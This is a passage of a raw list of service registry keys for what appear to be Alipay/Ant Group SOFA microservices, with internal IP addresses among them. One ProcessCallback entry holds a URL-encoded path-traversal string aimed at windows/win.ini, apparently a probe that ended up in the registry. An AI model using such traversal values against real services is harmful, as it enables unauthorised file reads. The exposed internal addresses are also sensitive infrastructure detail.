@#SOFA","DATA_ID_30.50.126.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.meta2:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.adbasiclib.ad.rpc.AdService:1.0:adexchange-common@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:bizfund@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.dispense.MerchantServiceDispenseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.itransferprod.service.facade.api.TopupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.accm.facade.AccmCCRFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rest.SearchRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accountprod.common.service.facade.account.AccountThroughFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.management.ConsultiveReissueService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.platform.biz.service.impl.component.platform.PlatformManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.capacity,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppcore.facade.QueryFundFlowDetailFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_${notify_worker_change_msg_broker_topic}#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.isdsp.common.service.facade.AuthSchemaServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.isupergwmng:name=com.alipay.sofa.runtime.drm.log4j2LevelDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfpcenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mordercenter.common.service.facade.api.query.StandardOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.common.service.facade.api.CrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_CREDIT_LDC_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mappprod.common.service.facade.confcenter.manager.PrincipalRuleRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","securitymegadatacalc@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.159.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.service.governance.facade.EntityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemng.facade.channelmanager.alarm.AlarmTopicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCCCreditAmountPromotionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.rule.core.publish.drm.RulePublishResource.drmPushDelayMillisec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.service.facade.detect.DetectTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.spi.ParmMntListPubSpi:1.0:masterdata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.international.bankaccount.AccountPropertyManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmonitor.common.service.facade.rule.AddService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlink.web.common.service.facade.RelationDiscoveryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.claimoperation.common.service.ClaimSurveyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgengine.open.facade.java.AkgQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PayChannelConsultDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.iad.facade.heatmap.RealtimeHeatMapOverviewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.baas.common.user.service.FeatureApplicationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.LotteryCardService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antscheduler.facade.IStreamExecuteInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.facade.InnerDecisionService:1.0:fininsightcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","agdsroalipay@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.maxFailTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cfpcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.PlaceHolderReplaceCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.YebCftransQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dchaincustomer.facade.api.userpicture.UserPictureService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insmarketingprod.common.service.facade.catalog.CatalogDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.facade.api.RecommendQuestionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.EncryptMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.policy.api.QueryUriRepositoryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.gtd.client.MobilechatGtdClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassistantcore.mng.facade.ops.api.GrayConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.core.drm.impl.FixedSlowSQLManageDRMResource.switchUidConfigStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilesearch.biz.rpc.service.VoiceToTextHybridFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_ASYCNTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acmcscore.facade.IssueStatisticFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.plugin.PluginServiceSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:adcharge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.InsCertificateDrmClient.policyNoList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iprobe.common.service.facade.apidoc.DataManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.octopus.core.facade.ServiceInfoQueryFacade:1.0:openexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmratecust.common.service.facade.rate.agreement.RateAgreementManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.72.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csinsight.common.service.facade.api.CrowdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpensionprod.common.service.facade.PensionCancelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchaincustomer.facade.api.member.MemberService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserFreezeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditagreement.common.service.agreement.org.PcreditOrgAgreementHandleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.walle.service.facade.api.RuixinTestMethodToDeleteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_MSG_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finbaservice.common.service.facade.contactmanage.api.FinancingInstContactManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acordercore.common.service.facade.trans.TransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetprod.common.facade.AssetRiskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.dashboard.DashboardSummaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.vouchercore.service.facade.api.voucher.VoucherPayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mrchcommercelab@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:demobff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebquery.common.facade.service.TransferInOrderQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.bullstock.FortuneCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.topic.topicIndexRelatedItemNewsCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkinstportal.common.service.facade.qrcode.api.QrCodeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@dchainabsprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.superapi.client.SystemAppInvokeService:1.0:imasp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.128.161#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.checkroute.common.service.checkersdk.service.ChangeRiskDefenseService:1.0:paychecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.SavedExpressSendSmsRuleResource.extQBizIdentityListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.SysConfigParamDrmResource.toolConfigMaxSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mwealthprod.common.service.facade.YouthPurseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.territory.service.TerritoryRuleDisplayCallback:1.0:visitPurposeQueryService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opencore.service.facade.tag.TagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchdt.dm.common.service.facade.api.DataSetConfigRuntimeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsettle.service.facade.common.api.BillManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.platform.facade.node.NodePageListApi:1.0:schedule-operation-platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:acmantzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.MenuQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xxePayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.core.service.assetcenter.api.AssetCenterManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_Topic_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zappinfo:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.55.194.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insttrade.common.service.facade.PaymentIdQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.247#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zdataquery.common.service.facade.hbase.FinBatchHbaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoprod.common.service.facade.equity.recall.EquityRecallFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.innertrans.facade.api.InnerRuleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.data.FtpDataSourceCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.balance.UserBalanceForGroupFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.PermissionManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.hbaseIsMaster,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.25.242.153#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:zmopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.102.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.service.facade.overseapcard.api.OSPCardtransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.schema.SchemaAccessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rone.biz.manager.support.api.StrategyDynamicProvider:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.scence.SceneDefineQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.benefitprod.common.service.mng.facade.CardTemplateMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshy.api.facade.AreaFacade:1.0:areaFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.airbops.biz.changemng.drm.ChangemngDrmConfig.aviatorFormat1,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:tr-service-enable@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exriskcenter.common.service.facade.api.query.TreeNodeRelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opscloudprod.facade.defense.OpsCldDefenseDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.isAsyncStore,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxprod.common.service.facade.api.servicelibrary.ServiceTempSyncDataMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ivostro.facade.api.VirtualAccountRuleManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.channel.config.SettleSchemaFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.maxSubActivityCountForGiftPackage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kabaocore.service.facade.CardOperateOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.capacity,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ibizsupport.common.service.facade.api.VAService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.McardUnfreezeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:lifeexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.AbnormalCompareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.iaassettrans.facade.fabs.api.manage.FinanceAssetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.adcenter.common.service.facade.drill.service.AdcFaultInjectFacade:1.0:iadcfaultcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revmng.common.service.facade.RevmngBankLogHandlerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaserver.facade.zcache.ZcacheServiceRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkforexbuss_feRemitProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.pagecomponent.PageComponentConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.development.common.facade.api.PrecompileApi:1.0:dpstreaming@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.fopMiniUrlOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditsceneprod.facade.PcreditSceneProdBenefitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.testOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_SOFA4#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CUSTINSIGHT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.custview.facade.ProfileViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbpunish.common.service.facade.category.EventCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobot.service.facade.mng.api.dst.DstBizCodeMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.openapi.BuildSiteHelperFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cfpcenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.industry.MccIndustryPoolManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.UserLoanAccountBalanceRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airprod.common.service.facade.freezeunfreeze.AirQueryTradeRefundFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.237.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.acctrans.service.facade.BatchPayProdTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.runtimedatasrcmng.common.service.facade.api.patrol.rule.PatrolAppRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.iris.facade.denoise.IrisDenoiseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.83.61.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finscene.common.service.facade.api.forward.StrategyRecFacade:1.0:finscene-surge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassistantcore.mng.facade.knowbase.api.KnowBaseManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.coreQualityPlus.common.facade.service.api.DingTalkMessageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insliveprod.common.service.facade.growth.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.FinadvisorLeaveManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.credible.UserCredibleMobileWriteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsdatahub.service.facade.quota.QuotaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.apiv2.ExternalMemberService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mobileacauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.stocktools.ToolsCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.service.facade.CampTriggerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.cryptprod.common.service.facade.HsmRsaCryptoFacade:1.0:@fccryptprod_service_unique_id@#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.recon.common.service.facade.api.RegisterClearingCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rpc.service.TranslateHybridFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.FinanceDataSource.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialportal.web.ps.rpc.facade.UserDisturbingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:accommodationSummaryDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.GroupCzoneQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.manage.facade.SysParamConfigMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.runtimedatasrcmng.common.service.facade.api.patrol.rule.PatrolRuleQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:certify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.134.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ordercore.mrch.common.service.api.sign.SignAssistantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.exchange.ExchangeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.itemcore.common.service.facade.v2.DisplayCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.common.service.facade.AbilityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:peerpayprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.160.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.159.155#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpwm.facade.api.PortfolioNetValueCalcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.category.ContentCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.106.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.custcenter.service.antg.facade.accesstoken.AgATKIdentificationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.v2.AutoPolicyFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.operation.OperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.simple.PayChannelDecisionSimpleService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.reloadRules,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.antfinancial.antchain.cloud.endpoint.facade.WebDataSourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.130.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mda_process_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:crq@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenestarwish.common.service.facade.api.FinsStarFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dss.endpoint.plugin.openapi.JdbcwriterMonitorOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.authprod.facade.account.QrCodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_I